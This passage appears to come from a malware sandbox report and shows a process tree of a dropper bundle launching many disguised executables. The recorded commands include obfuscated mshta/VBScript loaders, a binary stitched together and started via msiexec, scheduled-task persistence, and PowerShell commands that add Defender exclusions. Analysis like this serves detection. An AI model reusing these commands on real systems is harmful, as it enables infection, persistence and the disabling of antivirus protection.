                                                                                              10⤵
                                                                                                PID:4488
                                                                                                • C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe
                                                                                                  ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi
                                                                                                  11⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Checks whether UAC is enabled
                                                                                                  PID:3940
                                                                                                  • C:\Windows\SysWOW64\mshta.exe
                                                                                                    "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )
                                                                                                    12⤵
                                                                                                    • Checks whether UAC is enabled
                                                                                                    PID:5748
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "/PLQtzfgO0m8dRv4iYALOqi " == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"
                                                                                                      13⤵
                                                                                                        PID:1488
                                                                                                    • C:\Windows\SysWOW64\mshta.exe
                                                                                                      "C:\Windows\System32\mshta.exe" VbScRIpt: CLosE ( cReAteobjEcT ( "wscRiPt.SheLl" ). RUn ( "C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE ) )
                                                                                                      12⤵
                                                                                                      • Checks whether UAC is enabled
                                                                                                      PID:4808
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        "C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC
                                                                                                        13⤵
                                                                                                          PID:2300
                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                            C:\Windows\system32\cmd.exe /S /D /c" EcHo "
                                                                                                            14⤵
                                                                                                              PID:8856
                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                              C:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"
                                                                                                              14⤵
                                                                                                                PID:9044
                                                                                                              • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                msiexec -Y ..\lXQ2g.WC
                                                                                                                14⤵
                                                                                                                  PID:8784
                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                            taskkill -f -iM "search_hyperfs_206.exe"
                                                                                                            11⤵
                                                                                                            • Kills process with taskkill
                                                                                                            PID:864
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\setup.exe
                                                                                                      "C:\Users\Admin\AppData\Local\Temp\setup.exe"
                                                                                                      8⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:4800
                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4800 -s 792
                                                                                                        9⤵
                                                                                                        • Program crash
                                                                                                        PID:4820
                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4800 -s 812
                                                                                                        9⤵
                                                                                                        • Program crash
                                                                                                        PID:6432
                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4800 -s 768
                                                                                                        9⤵
                                                                                                        • Program crash
                                                                                                        PID:6920
                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4800 -s 776
                                                                                                        9⤵
                                                                                                        • Program crash
                                                                                                        PID:7160
                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4800 -s 920
                                                                                                        9⤵
                                                                                                        • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                        • Program crash
                                                                                                        PID:7196
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\chenxiulan-game.exe
                                                                                                      "C:\Users\Admin\AppData\Local\Temp\chenxiulan-game.exe"
                                                                                                      8⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:3252
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe
                                                                                                      "C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"
                                                                                                      8⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Loads dropped DLL
                                                                                                      PID:4992
                                                                                                      • C:\Users\Admin\AppData\Roaming\Calculator\setup.exe
                                                                                                        C:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=1
                                                                                                        9⤵
                                                                                                        • Loads dropped DLL
                                                                                                        • Adds Run key to start application
                                                                                                        • Checks whether UAC is enabled
                                                                                                        PID:8332
                                                                                                        • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                          "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--iUSIg"
                                                                                                          10⤵
                                                                                                          • Loads dropped DLL
                                                                                                          PID:7260
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\6.exe
                                                                                                      "C:\Users\Admin\AppData\Local\Temp\6.exe"
                                                                                                      8⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:3872
                                                                                                      • C:\Windows\system32\WerFault.exe
                                                                                                        C:\Windows\system32\WerFault.exe -u -p 3872 -s 1544
                                                                                                        9⤵
                                                                                                        • Program crash
                                                                                                        PID:6752
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                C:\Windows\system32\cmd.exe /c Sun038db98f99bf9a.exe
                                                                                                5⤵
                                                                                                  PID:4776
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS01DF1F46\Sun038db98f99bf9a.exe
                                                                                                    Sun038db98f99bf9a.exe
                                                                                                    6⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:4404
                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\hQR7ltbhVSZWeDnIfz0ItlqJ.exe
                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\hQR7ltbhVSZWeDnIfz0ItlqJ.exe"
                                                                                                      7⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:904
                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\9LhK9L3FLJ9GIO_ztSBdqXK2.exe
                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\9LhK9L3FLJ9GIO_ztSBdqXK2.exe"
                                                                                                      7⤵
                                                                                                      • Drops file in Program Files directory
                                                                                                      PID:5280
                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                        schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
                                                                                                        8⤵
                                                                                                        • Creates scheduled task(s)
                                                                                                        PID:7252
                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                        schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
                                                                                                        8⤵
                                                                                                        • Creates scheduled task(s)
                                                                                                        PID:6824
                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\k9mrYWOjh4XGQDk8SggxS5TJ.exe
                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\k9mrYWOjh4XGQDk8SggxS5TJ.exe"
                                                                                                      7⤵
                                                                                                        PID:6272
                                                                                                      • C:\Users\Admin\Pictures\Adobe Films\N6uRTnwM9LbCUPo2U4Y5_adX.exe
                                                                                                        "C:\Users\Admin\Pictures\Adobe Films\N6uRTnwM9LbCUPo2U4Y5_adX.exe"
                                                                                                        7⤵
                                                                                                        • Checks BIOS information in registry
                                                                                                        • Checks whether UAC is enabled
                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                        PID:6184
                                                                                                      • C:\Users\Admin\Pictures\Adobe Films\o8cabBs1E_YtYFvWJ38MhTHv.exe
                                                                                                        "C:\Users\Admin\Pictures\Adobe Films\o8cabBs1E_YtYFvWJ38MhTHv.exe"
                                                                                                        7⤵
                                                                                                          PID:6332
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 6332 -s 652
                                                                                                            8⤵
                                                                                                            • Program crash
                                                                                                            PID:6600
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 6332 -s 668
                                                                                                            8⤵
                                                                                                            • Program crash
                                                                                                            PID:7156
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 6332 -s 672
                                                                                                            8⤵
                                                                                                            • Program crash
                                                                                                            PID:5532
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 6332 -s 676
                                                                                                            8⤵
                                                                                                            • Program crash
                                                                                                            PID:6828
                                                                                                        • C:\Users\Admin\Pictures\Adobe Films\7Crav7jBDdDcvhzOQhcQgqjv.exe
                                                                                                          "C:\Users\Admin\Pictures\Adobe Films\7Crav7jBDdDcvhzOQhcQgqjv.exe"
                                                                                                          7⤵
                                                                                                            PID:6444
                                                                                                          • C:\Users\Admin\Pictures\Adobe Films\Gd6Exw6O_6rmsGpWkQvokt4J.exe
                                                                                                            "C:\Users\Admin\Pictures\Adobe Films\Gd6Exw6O_6rmsGpWkQvokt4J.exe"
                                                                                                            7⤵
                                                                                                              PID:6724
                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                          C:\Windows\system32\cmd.exe /c Sun038aa349e3318e.exe
                                                                                                          5⤵
                                                                                                            PID:1996
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS01DF1F46\Sun038aa349e3318e.exe
                                                                                                              Sun038aa349e3318e.exe
                                                                                                              6⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Checks computer location settings
                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                              PID:3732
                                                                                                              • C:\Users\Admin\Pictures\Adobe Films\aKSJRLncSdG854P1YBtjUQIl.exe
                                                                                                                "C:\Users\Admin\Pictures\Adobe Films\aKSJRLncSdG854P1YBtjUQIl.exe"
                                                                                                                7⤵
                                                                                                                • Executes dropped EXE
                                                                                                                PID:1548
                                                                                                              • C:\Users\Admin\Pictures\Adobe Films\mWq60BpJF0olSlhOaScQBfh3.exe
                                                                                                                "C:\Users\Admin\Pictures\Adobe Films\mWq60BpJF0olSlhOaScQBfh3.exe"
                                                                                                                7⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • Checks whether UAC is enabled
                                                                                                                • Drops file in Program Files directory
                                                                                                                PID:2208
                                                                                                                • C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe
                                                                                                                  "C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe"
                                                                                                                  8⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  • Checks whether UAC is enabled
                                                                                                                  • Drops file in Program Files directory
                                                                                                                  PID:5640
                                                                                                                • C:\Program Files (x86)\Company\NewProduct\cutm3.exe
                                                                                                                  "C:\Program Files (x86)\Company\NewProduct\cutm3.exe"
                                                                                                                  8⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  PID:5652
                                                                                                              • C:\Users\Admin\Pictures\Adobe Films\JiCJelwxbuvoRq6XaE2OR10I.exe
                                                                                                                "C:\Users\Admin\Pictures\Adobe Films\JiCJelwxbuvoRq6XaE2OR10I.exe"
                                                                                                                7⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • Checks BIOS information in registry
                                                                                                                • Checks whether UAC is enabled
                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                PID:2196
                                                                                                              • C:\Users\Admin\Pictures\Adobe Films\uHBrekWZseZcNZXt7M_rM5Pu.exe
                                                                                                                "C:\Users\Admin\Pictures\Adobe Films\uHBrekWZseZcNZXt7M_rM5Pu.exe"
                                                                                                                7⤵
                                                                                                                • Executes dropped EXE
                                                                                                                PID:2088
                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2088 -s 652
                                                                                                                  8⤵
                                                                                                                  • Program crash
                                                                                                                  PID:1660
                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2088 -s 672
                                                                                                                  8⤵
                                                                                                                  • Program crash
                                                                                                                  PID:6300
                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2088 -s 628
                                                                                                                  8⤵
                                                                                                                  • Program crash
                                                                                                                  PID:6744
                                                                                                              • C:\Users\Admin\Pictures\Adobe Films\VBiAWt4fABQifLQUjZAq3_wl.exe
                                                                                                                "C:\Users\Admin\Pictures\Adobe Films\VBiAWt4fABQifLQUjZAq3_wl.exe"
                                                                                                                7⤵
                                                                                                                  PID:4628
                                                                                                                • C:\Users\Admin\Pictures\Adobe Films\6fgeUFYWrWIzkL6SJkdQM4Pm.exe
                                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\6fgeUFYWrWIzkL6SJkdQM4Pm.exe"
                                                                                                                  7⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  PID:900
                                                                                                                • C:\Users\Admin\Pictures\Adobe Films\gPMQ2KmUDxPJ3CnOC3mcjoKl.exe
                                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\gPMQ2KmUDxPJ3CnOC3mcjoKl.exe"
                                                                                                                  7⤵
                                                                                                                    PID:2280
                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                      schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
                                                                                                                      8⤵
                                                                                                                      • Creates scheduled task(s)
                                                                                                                      PID:1556
                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                      schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
                                                                                                                      8⤵
                                                                                                                      • Creates scheduled task(s)
                                                                                                                      PID:6964
                                                                                                                    • C:\Users\Admin\Documents\keBIdL6C6jzOiOUyZR646gIc.exe
                                                                                                                      "C:\Users\Admin\Documents\keBIdL6C6jzOiOUyZR646gIc.exe"
                                                                                                                      8⤵
                                                                                                                        PID:3904
                                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\IMA9sF2zF4oCz4D5e7hciUYM.exe
                                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\IMA9sF2zF4oCz4D5e7hciUYM.exe"
                                                                                                                      7⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                                                      PID:5212
                                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\Ak0o6UGn77WNursf1y3lEair.exe
                                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\Ak0o6UGn77WNursf1y3lEair.exe"
                                                                                                                      7⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      • Checks BIOS information in registry
                                                                                                                      • Checks whether UAC is enabled
                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                      PID:5160
                                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\lLbo4ZRo_ZYCpxeTuDpTUBKc.exe
                                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\lLbo4ZRo_ZYCpxeTuDpTUBKc.exe"
                                                                                                                      7⤵
                                                                                                                        PID:5148
                                                                                                                      • C:\Users\Admin\Pictures\Adobe Films\MPCHjDYALD0CPBDiUTdmY7N_.exe
                                                                                                                        "C:\Users\Admin\Pictures\Adobe Films\MPCHjDYALD0CPBDiUTdmY7N_.exe"
                                                                                                                        7⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        • Checks BIOS information in registry
                                                                                                                        • Checks whether UAC is enabled
                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                        PID:5324
                                                                                                                      • C:\Users\Admin\Pictures\Adobe Films\TS4FQwCUchS4smrA9eFoBTMM.exe
                                                                                                                        "C:\Users\Admin\Pictures\Adobe Films\TS4FQwCUchS4smrA9eFoBTMM.exe"
                                                                                                                        7⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                        PID:5404
                                                                                                                        • C:\Users\Admin\Pictures\Adobe Films\TS4FQwCUchS4smrA9eFoBTMM.exe
                                                                                                                          "C:\Users\Admin\Pictures\Adobe Films\TS4FQwCUchS4smrA9eFoBTMM.exe"
                                                                                                                          8⤵
                                                                                                                            PID:3124
                                                                                                                        • C:\Users\Admin\Pictures\Adobe Films\3BvnF7NxSW1huak4tJrLdwtK.exe
                                                                                                                          "C:\Users\Admin\Pictures\Adobe Films\3BvnF7NxSW1huak4tJrLdwtK.exe"
                                                                                                                          7⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Drops startup file
                                                                                                                          • Windows security modification
                                                                                                                          • Checks whether UAC is enabled
                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                          • System policy modification
                                                                                                                          PID:6092
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\8bc2fe43-dfdc-4025-a1e4-d5f342f12773\AdvancedRun.exe
                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\8bc2fe43-dfdc-4025-a1e4-d5f342f12773\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\8bc2fe43-dfdc-4025-a1e4-d5f342f12773\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
                                                                                                                            8⤵
                                                                                                                              PID:6316
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\8bc2fe43-dfdc-4025-a1e4-d5f342f12773\AdvancedRun.exe
                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\8bc2fe43-dfdc-4025-a1e4-d5f342f12773\AdvancedRun.exe" /SpecialRun 4101d8 6316
                                                                                                                                9⤵
                                                                                                                                  PID:6600
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\760cc890-5611-4bed-b0ef-6280ea2d2482\AdvancedRun.exe
                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\760cc890-5611-4bed-b0ef-6280ea2d2482\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\760cc890-5611-4bed-b0ef-6280ea2d2482\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
                                                                                                                                8⤵
                                                                                                                                  PID:6392
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\760cc890-5611-4bed-b0ef-6280ea2d2482\AdvancedRun.exe
                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\760cc890-5611-4bed-b0ef-6280ea2d2482\AdvancedRun.exe" /SpecialRun 4101d8 6392
                                                                                                                                    9⤵
                                                                                                                                      PID:6228
                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\Adobe Films\3BvnF7NxSW1huak4tJrLdwtK.exe" -Force
                                                                                                                                    8⤵
                                                                                                                                      PID:6600
                                                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                        9⤵
                                                                                                                                          PID:6316
                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\Adobe Films\3BvnF7NxSW1huak4tJrLdwtK.exe" -Force
                                                                                                                                        8⤵
                                                                                                                                          PID:6768
                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\Adobe Films\3BvnF7NxSW1huak4tJrLdwtK.exe" -Force
                                                                                                                                          8⤵
                                                                                                                                            PID:6488
                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8CD8CA21.exe" -Force
                                                                                                                                            8⤵
                                                                                                                                              PID:6952
                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8CD8CA21.exe" -Force
                                                                                                                                              8⤵
                                                                                                                                                PID:4980
                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\Adobe Films\3BvnF7NxSW1huak4tJrLdwtK.exe" -Force
                                                                                                                                                8⤵
                                                                                                                                                  PID:6396
                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8CD8CA21.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8CD8CA21.exe"
                                                                                                                                                  8⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  • Checks whether UAC is enabled
                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                  • Drops file in Program Files directory
                                                                                                                                                  • System policy modification
                                                                                                                                                  PID:2280
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\e0247d83-7cb4-4008-bad5-aea4488cb5d4\AdvancedRun.exe
                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\e0247d83-7cb4-4008-bad5-aea4488cb5d4\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\e0247d83-7cb4-4008-bad5-aea4488cb5d4\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
                                                                                                                                                    9⤵
                                                                                                                                                      PID:7948
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\e0247d83-7cb4-4008-bad5-aea4488cb5d4\AdvancedRun.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\e0247d83-7cb4-4008-bad5-aea4488cb5d4\AdvancedRun.exe" /SpecialRun 4101d8 7948
                                                                                                                                                        10⤵
                                                                                                                                                          PID:7460
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\9fac2e1b-9ecc-44b9-9931-3a6070047665\AdvancedRun.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\9fac2e1b-9ecc-44b9-9931-3a6070047665\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\9fac2e1b-9ecc-44b9-9931-3a6070047665\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
                                                                                                                                                        9⤵
                                                                                                                                                          PID:7936
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\9fac2e1b-9ecc-44b9-9931-3a6070047665\AdvancedRun.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\9fac2e1b-9ecc-44b9-9931-3a6070047665\AdvancedRun.exe" /SpecialRun 4101d8 7936
                                                                                                                                                            10⤵
                                                                                                                                                              PID:7804
                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8CD8CA21.exe" -Force
                                                                                                                                                            9⤵
                                                                                                                                                              PID:2004
                                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8CD8CA21.exe" -Force
                                                                                                                                                              9⤵
                                                                                                                                                                PID:7804
                                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8CD8CA21.exe" -Force
                                                                                                                                                                9⤵
                                                                                                                                                                  PID:4640
                                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Public\Documents\03B82AA2\svchost.exe" -Force
                                                                                                                                                                  9⤵
                                                                                                                                                                    PID:7952
                                                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8CD8CA21.exe" -Force
                                                                                                                                                                    9⤵
                                                                                                                                                                      PID:2304
                                                                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Public\Documents\03B82AA2\svchost.exe" -Force
                                                                                                                                                                      9⤵
                                                                                                                                                                        PID:4460
                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8CD8CA21.exe
                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8CD8CA21.exe"
                                                                                                                                                                        9⤵
                                                                                                                                                                          PID:5188
                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8CD8CA21.exe
                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8CD8CA21.exe"
                                                                                                                                                                          9⤵
                                                                                                                                                                            PID:6132
                                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Public\Documents\03B82AA2\svchost.exe" -Force
                                                                                                                                                                          8⤵
                                                                                                                                                                            PID:1172
                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\Adobe Films\3BvnF7NxSW1huak4tJrLdwtK.exe" -Force
                                                                                                                                                                            8⤵
                                                                                                                                                                              PID:7240
                                                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Public\Documents\03B82AA2\svchost.exe" -Force
                                                                                                                                                                              8⤵
                                                                                                                                                                                PID:7408
                                                                                                                                                                              • C:\Users\Admin\Pictures\Adobe Films\3BvnF7NxSW1huak4tJrLdwtK.exe
                                                                                                                                                                                "C:\Users\Admin\Pictures\Adobe Films\3BvnF7NxSW1huak4tJrLdwtK.exe"
                                                                                                                                                                                8⤵
                                                                                                                                                                                  PID:7712
                                                                                                                                                                              • C:\Users\Admin\Pictures\Adobe Films\NcPLicfjt0IaLJbo8lL7wbQO.exe
